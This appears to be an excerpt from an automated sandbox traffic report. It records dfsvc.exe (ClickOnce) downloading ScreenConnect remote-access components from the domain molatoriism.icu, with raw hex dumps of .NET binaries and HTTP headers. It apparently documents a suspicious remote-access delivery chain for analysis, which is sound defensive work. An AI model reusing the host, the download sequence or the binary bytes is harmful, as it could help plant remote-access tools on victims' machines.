                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: a2 25 18 7e 60 00 00 0a 72 76 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4c 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 19 7e 60 00 00 0a 72 f6 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4e 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 1a 7e 60 00 00 0a 72 6a 04 00 70 17 6f fe 00 00 0a 14 02 fe 06 4f 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 6f 63 00 00 0a 02 28 e5 00 00 0a 28 1b 00 00 2b 28 1c 00 00 2b 0a 06 6f ff 00 00 0a 28 1d 00 00 2b 14 18 28 1e 00 00 2b 0b 02 28 3e 00 00 06 28 02 01 00 0a 3a 01 01 00 00 02 28 3e 00 00 06 28 03 01 00 0a 0c 07 6f 04 01 00 0a 25 2d 0d 26 12 05 fe 15 17 00 00 1b 11 05 2b 0a 28 05 01 00 0a 73 06 01 00 0a 0d 12 02 28 07 01 00 0a 28 08 01 00 0a 13 04 12 03 28 09 01 00 0a 2d 03 17 2b 0e 12 03 28 0a 01 00 0a 11 04 28 0b 01 00 0a 2c
                                                                                                                                                                              Data Ascii: %~`rvpoLssv%~`rpoNssv%~`rjpoOssvoc((+(+o(+(+(>(:(>(o%-&+(s(((-+((,
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 7e 4a 00 00 04 25 2d 17 26 7e 49 00 00 04 fe 06 9f 00 00 06 73 31 01 00 0a 25 80 4a 00 00 04 28 1f 00 00 2b 28 20 00 00 2b 28 21 00 00 2b 0a 02 28 e5 00 00 0a 28 61 00 00 06 02 28 e5 00 00 0a 06 6f 63 00 00 0a 2a 1e 02 28 23 00 00 06 2a 1a 7e 2c 00 00 04 2a 00 00 13 30 0f 00 25 02 00 00 14 00 00 11 73 a4 00 00 06 0a 06 14 7d 4f 00 00 04 06 14 7d 50 00 00 04 06 14 7d 52 00 00 04 06 14 7d 51 00 00 04 06 14 7d 53 00 00 04 03 19 8d 40 00 00 01 25 16 06 73 e7 00 00 0a 25 17 6f 35 01 00 0a 25 1b 6f 26 00 00 0a 17 8d 40 00 00 01 25 16 06 73 a6 00 00 0a 25 1a 6f 25 00 00 0a 25 7e 20 00 00 04 6f 29 00 00 0a 25 7e 1d 00 00 04 6f ea 00 00 0a 25 73 1b 00 00 06 6f 28 00 00 0a 25 0b 7d 50 00 00 04 07 a2 28 22 00 00 2b 25 0c 7d 52 00 00 04 08 a2 25 17 06 73 e7 00 00 0a
                                                                                                                                                                              Data Ascii: ~J%-&~Is1%J(+( +(!+((a(oc*(#*~,*0%s}O}P}R}Q}S@%s%o5%o&@%s%o%%~ o)%~o%so(%}P("+%}R%s
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 00 00 11 02 28 11 00 00 2b 28 23 00 00 2b 6f 4d 01 00 0a 0a 2b 0c 12 00 28 4e 01 00 0a 28 62 00 00 06 12 00 28 4f 01 00 0a 2d eb de 0e 12 00 fe 16 1a 00 00 1b 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 11 00 19 2a 00 0e 00 00 00 00 13 30 02 00 2d 00 00 00 16 00 00 11 02 75 4b 00 00 01 0a 06 2c 0b 06 6f e5 00 00 0a 28 61 00 00 06 02 6f 95 00 00 0a 25 2d 03 26 2b 05 28 0c 01 00 0a 02 6f 50 01 00 0a 2a 72 1f 16 7e 19 00 00 0a 28 1a 00 00 0a 73 51 01 00 0a 72 98 0d 00 70 28 52 01 00 0a 2a 00 00 13 30 04 00 dd 00 00 00 00 00 00 00 28 53 01 00 0a 28 24 00 00 2b 7e 56 00 00 04 25 2d 17 26 7e 55 00 00 04 fe 06 ac 00 00 06 73 55 01 00 0a 25 80 56 00 00 04 28 25 00 00 2b 28 57 01 00 0a 28 26 00 00 2b 28 59 01 00 0a 7e 57 00 00 04 25 2d 17 26 7e 55 00 00 04 fe
                                                                                                                                                                              Data Ascii: (+(#+oM+(N(b(O-o[**0-uK,o(ao%-&+(oP*r~(sQrp(R*0(S($+~V%-&~UsU%V(%+(W(&+(Y~W%-&~U
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 06 7c 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 21 02 1f 37 16 28 a8 00 00 0a 16 28 a8 00 00 0a 18 20 e8 03 00 00 06 7c 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 0e 06 02 1f f2 28 8c 01 00 0a 7d 64 00 00 04 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 02 14 2a 06 fe 06 bc 00 00 06 73 8d 01 00 0a 17 28 35 00 00 2b 2a 00 1b 30 02 00 5d 00 00 00 1e 00 00 11 02 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 07 02 6f 90 01 00 0a 2a 02 03 73 91 01 00 0a 0a 06 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 09 06 6f 90 01 00 0a 0b de 27 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 02 6f 90 01 00 0a 0c 08 03 73 92 01 00 0a 0b de 0a 08 2c 06 08 6f 5b 00 00 0a dc 07 2a 00 00 00 01 1c 00 00 02 00 1d 00 19 36 00 0a 00 00 00 00 02 00 47 00 0a
                                                                                                                                                                              Data Ascii: |d(&{d({,!7(( |d(&{d({,(}d{d({,*s(5+*0]o(,o*so(,o',o[os,o[*6G
                                                                                                                                                                              2024-11-07 17:04:30 UTC1369INData Raw: 00 00 2b 6f bc 01 00 0a 0a 2b 66 06 6f bd 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 d7 00 00 0a 02 28 be 01 00 0a 0b 12 01 28 d9 00 00 0a 02 28 bd 00 00 0a 0c 12 02 28 86 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 db 00 00 0a 59 02 28 bd 00 00 0a 0c 12 02 28 bf 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 dd 00 00 0a 59 73 c0 01 00 0a 6f 98 00 00 06 06 6f 70 00 00 0a 2d 92 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 18 00 72 8a 00 0a 00 00 00 00 1e 02 28 c1 01 00 0a 2a 22 02 03 28 f9 00 00 0a 2a 22 02 03 6f c2 01 00 0a 2a 00 00 13 30 04 00 60 00 00 00 25 00 00 11 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 02 6f c3 01 00 0a 0a 12 00 28 bf 01 00 0a 02 28 04 01 00 0a 2c 2c 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 6b 02 28 04 01 00 0a 6f c4 01 00 0a
                                                                                                                                                                              Data Ascii: +o+fo((((((((Y((((Ysoop-,o[*r(*"(*"o*0`%o(o((,,o(k(o


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.549722172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:31 UTC111OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:32 UTC769INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OcmTTD2zQ%2Bgzhh69Zo8HREEk%2BcclFSp3jweb2GrIvbrBJr2lfmRKPfu2VxgMGLrUSeAEVtQxGV77kSyvOthGQZTs2W9E9H6dqYgRt5qSewGeJ84PoSg7maSNHudMrRkR7s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7259f9c6bd4-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=726&delivery_rate=1910290&cwnd=251&unsent_bytes=0&cid=ed74304afccacfe6&ts=817&x=0"
                                                                                                                                                                              2024-11-07 17:04:32 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                              Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                              2024-11-07 17:04:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.549729172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:33 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:33 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:33 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDYT1xl%2Bt84YY2SOlLLLv1W7opLDOPr%2F0Qhww2WwB7TiE8XkBoHexwJriti21G8APK2%2F0hVZbtXEXm7Ydy90KOtX90bo57ykJQz1V6uWCsCdWKKgL900cJhsZtkEyyddLM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee72efda9e796-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1379&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=721&delivery_rate=2058280&cwnd=251&unsent_bytes=0&cid=e220a32194fbab39&ts=751&x=0"
                                                                                                                                                                              2024-11-07 17:04:33 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                              Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                              2024-11-07 17:04:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.549738172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:34 UTC114OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:34 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:34 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDYKMIgG5TW7wXjZOBB9tK%2Frs2ks07zxEr0TJ2tHKzJS6FkDLX0YREog8QR1Uel33m9XTTVt%2Fx5K0Wi%2BktisnTJ6qmIhbPxQHPgb1SvNlGOUnLYmvEaWqJy5pcd%2BJKqukN0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee737993ab78c-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=729&delivery_rate=1223489&cwnd=158&unsent_bytes=0&cid=b40f982a6465c80a&ts=301&x=0"
                                                                                                                                                                              2024-11-07 17:04:34 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                              Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                              2024-11-07 17:04:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.549742172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:35 UTC104OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:35 UTC792INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:35 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              CF-Cache-Status: BYPASS
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKiZ2PyIMJJUDBtNkWOqYAJ3kdCgxrGfuVpwxyq1%2BfFQ7YTmb7qOxxAjt4qjEPmQeVZ4rb9YSYcpSVoW2QUyAMGBuVNc8dquBC%2BbnDG8UDcBuE%2FfqQ0UqQlXxUsSl94XLRM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee73d59ed2c87-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=719&delivery_rate=1983561&cwnd=228&unsent_bytes=0&cid=3d8259312e81882e&ts=327&x=0"
                                                                                                                                                                              2024-11-07 17:04:35 UTC577INData Raw: 37 64 33 64 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 7d3dMZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 16 00 00 0a 2a 5e 02 28 16 00 00 0a 02 17 8d 3b 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 03 00 00 04 2a 00 00 00 1b 30 07 00 9c 01 00 00 01 00 00 11 73 3e 00 00 06 0a 28 17 00 00 0a 28 18 00 00 0a 28 19 00 00 0a 28 1a 00 00 0a 28 1b 00 00 0a 16 28 1c 00 00 0a 28 1d 00 00 0a 0b 06 73 1e 00 00 0a 7d 42 00 00 04 06 73 1f 00 00 0a 7d 43 00 00 04 06 7e 40 00 00 04 25 2d 17 26 7e 3f 00 00 04 fe 06 3c 00 00 06 73 20 00 00 0a 25 80 40 00 00 04 6f 01 00 00 2b 0c 06 06 fe 06 40 00 00 06 73 20 00 00 0a 6f 01 00 00 2b 0d 06 06 06 fe 06 41 00 00 06 73 21 00 00 0a 6f 02 00 00 2b 7d
                                                                                                                                                                              Data Ascii: (*^(;%}*:(}*:(}*:(}*0s>(((((((s}Bs}C~@%-&~?<s %@o+@s o+As!o+}
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 06 7b 0f 00 00 04 16 17 12 01 e0 28 54 00 00 0a 26 16 d3 03 04 05 28 46 00 00 0a 2a 1b 30 09 00 55 02 00 00 05 00 00 11 0e 04 1f 2b 40 d4 01 00 00 0e 06 28 42 00 00 0a 0a 06 7b 1d 00 00 04 06 7b 1a 00 00 04 17 28 4b 00 00 0a 0b 06 7b 1e 00 00 04 28 55 00 00 0a 0c 08 06 7b 1f 00 00 04 28 56 00 00 0a 28 57 00 00 0a 6f 58 00 00 0a 08 12 01 28 4c 00 00 0a 2d 03 16 2b 16 12 01 28 4d 00 00 0a 7b 59 00 00 0a 20 80 00 00 00 28 05 00 00 2b 2d 07 28 5a 00 00 0a 2b 05 28 5b 00 00 0a 6f 5c 00 00 0a 12 01 28 4c 00 00 0a 2d 03 17 2b 16 12 01 28 4d 00 00 0a 7b 4e 00 00 0a 20 00 08 00 00 28 04 00 00 2b 2c 53 08 28 5d 00 00 0a 06 7c 1f 00 00 04 7b 5e 00 00 0a 06 7c 1f 00 00 04 7b 5f 00 00 0a 06 7c 1f 00 00 04 7b 60 00 00 0a 58 18 5b 06 7c 1f 00 00 04 7b 61 00 00 0a 06 7c
                                                                                                                                                                              Data Ascii: {(T&(F*0U+@(B{{(K{(U{(V(WoX(L-+(M{Y (+-(Z+([o\(L-+(M{N (+,S(]|{^|{_|{`X[|{a|
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 6f 7e 00 00 0a 2d b7 de 0c 11 05 2c 07 11 05 6f 2e 00 00 0a dc 2a 00 01 1c 00 00 02 00 15 01 58 6d 01 0c 00 00 00 00 02 00 6d 02 4d ba 02 0c 00 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 32 2e 30 2e 35 30 37 32 37 00 00 00 00 05 00 6c 00 00 00 c4 12 00 00 23 7e 00 00 30 13 00 00 04 14 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 34 27 00 00 48 01 00 00 23 55 53 00 7c 28 00 00 10 00 00 00 23 47 55 49 44 00 00 00 8c 28 00 00 b4 09 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 7f 02 0a 09 0e 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 67 00 00 00 1a 00 00 00 52 00 00 00 42 00 00 00 5d 00 00 00 02 00 00 00 8e 00 00 00 1c 00 00 00 37 00 00 00 11 00 00 00 01 00 00 00 06 00 00 00 07 00 00 00 0d 00 00 00 01 00 00 00 06 00 00 00 05 00 00 00
                                                                                                                                                                              Data Ascii: o~-,o.*XmmMBSJBv2.0.50727l#~0#Strings4'H#US|(#GUID(#BlobW3gRB]7
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 06 00 b1 01 22 02 06 00 7c 0b 22 02 06 00 1d 12 22 02 06 00 aa 03 43 06 06 00 f6 06 22 02 06 00 ab 01 22 02 06 00 b1 01 22 02 06 00 a6 0d 22 02 06 00 53 07 22 02 06 00 93 0c 43 06 06 00 6a 01 43 06 06 00 8c 0c 4b 06 06 00 aa 03 43 06 51 80 7c 03 22 02 51 80 3b 02 22 02 51 80 64 03 22 02 51 80 85 03 22 02 51 80 4f 03 22 02 51 80 b8 01 22 02 51 80 de 01 22 02 51 80 f0 01 22 02 51 80 90 01 22 02 51 80 d3 01 22 02 56 80 c8 01 22 02 56 80 01 02 22 02 51 80 17 02 22 02 51 80 8f 03 22 02 51 80 0c 02 22 02 51 80 5d 01 22 02 06 06 a2 03 22 02 56 80 67 02 50 06 56 80 a7 02 50 06 06 06 a2 03 22 02 56 80 ed 02 54 06 56 80 c0 02 54 06 56 80 af 02 54 06 56 80 3f 03 54 06 56 80 77 02 54 06 56 80 52 02 54 06 56 80 6e 03 54 06 16 00 d1 05 58 06 16 00 2e 06 60 06 16 00 c6
                                                                                                                                                                              Data Ascii: "|""C""""S"CjCKCQ|"Q;"Qd"Q"QO"Q"Q"Q"Q"Q"V"V"Q"Q"Q"Q]""VgPVP"VTVTVTV?TVwTVRTVnTX.`
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 00 02 00 96 0b 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 03 00 c1 04 00 00 01 00 a8 04 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 03 00 c1 04 00 00 00 00 00 00 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 b8 12 00 00 01 00 23 10 00 00 02 00 cd 03 00 00 01 00 e2 06 02 00 01 00 e1 06 01 20 01 00 b6 04 02 00 02 00 8a 05 00 00 01 00 8b 05 00 00 01 00 17 11 02 00 01 00 17 11 00 00 01 00 96 0b 00 00 01 00 96 0b 00 00 01 00 9c 06 00 20 01 00 9c 06 00 00 01 00 4f 06 00 00 01 00 3d 13 00 00 01 00 2b 0c 00 00 01 00 96 0b 00 00 02 00 89 0e 00 00 01 00 c8 03 00 00 02 00
                                                                                                                                                                              Data Ascii: # O=+
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 08 00 90 00 2e 05 08 00 94 00 33 05 08 00 98 00 38 05 08 00 9c 00 3d 05 08 00 a0 00 42 05 08 00 a4 00 47 05 08 00 a8 00 4c 05 08 00 ac 00 51 05 08 00 b0 00 33 05 08 00 b4 00 56 05 08 00 b8 00 2e 05 08 00 bc 00 5b 05 08 00 c0 00 60 05 08 00 c8 00 29 05 08 00 cc 00 2e 05 08 00 d4 00 65 05 08 00 d8 00 6a 05 08 00 dc 00 6f 05 08 00 e0 00 74 05 08 00 e4 00 79 05 08 00 e8 00 7e 05 08 00 ec 00 83 05 08 00 18 01 51 05 08 00 1c 01 88 05 08 00 20 01 8d 05 25 00 12 00 a5 06 27 00 5b 00 2e 05 27 00 2a 00 a9 09 2e 00 0b 00 7b 07 2e 00 13 00 84 07 2e 00 1b 00 a3 07 2e 00 23 00 ac 07 2e 00 2b 00 cc 07 2e 00 33 00 df 07 2e 00 3b 00 a5 06 2e 00 43 00 a5 06 2e 00 4b 00 fb 07 43 00 63 00 2e 05 43 00 0a 00 2e 05 63 00 63 00 2e 05 63 00 0a 00 2e 05 63 00 6b 00 15 08 81 00 63
                                                                                                                                                                              Data Ascii: .38=BGLQ3V.[`).ejoty~Q %'[.'*.{...#.+.3.;.C.KCc.C.cc.c.ckc
                                                                                                                                                                              2024-11-07 17:04:35 UTC1369INData Raw: 54 56 45 5f 54 4f 47 47 4c 45 00 54 56 49 46 5f 53 54 41 54 45 00 4d 41 58 5f 54 45 58 54 5f 53 49 5a 45 00 52 65 63 74 61 6e 67 6c 65 46 00 4d 53 47 00 57 48 00 47 57 4c 00 54 56 4d 5f 47 45 54 4e 45 58 54 49 54 45 4d 00 54 56 49 54 45 4d 00 46 4f 52 43 45 46 49 4c 45 53 59 53 54 45 4d 00 4d 49 49 4d 00 42 4f 54 54 4f 4d 00 57 4d 00 53 49 47 44 4e 00 46 4f 52 43 45 53 48 4f 57 48 49 44 44 45 4e 00 3c 3e 4f 00 4d 45 4e 55 49 54 45 4d 49 4e 46 4f 00 3c 64 69 61 6c 6f 67 3e 50 00 46 44 41 50 00 54 4f 50 00 53 57 50 00 48 49 44 45 50 49 4e 4e 45 44 50 4c 41 43 45 53 00 48 49 44 45 4d 52 55 50 4c 41 43 45 53 00 4d 46 53 00 54 56 49 53 00 46 49 4c 45 4f 50 45 4e 44 49 41 4c 4f 47 4f 50 54 49 4f 4e 53 00 41 4c 4c 4f 57 4d 55 4c 54 49 53 45 4c 45 43 54 00 52 45
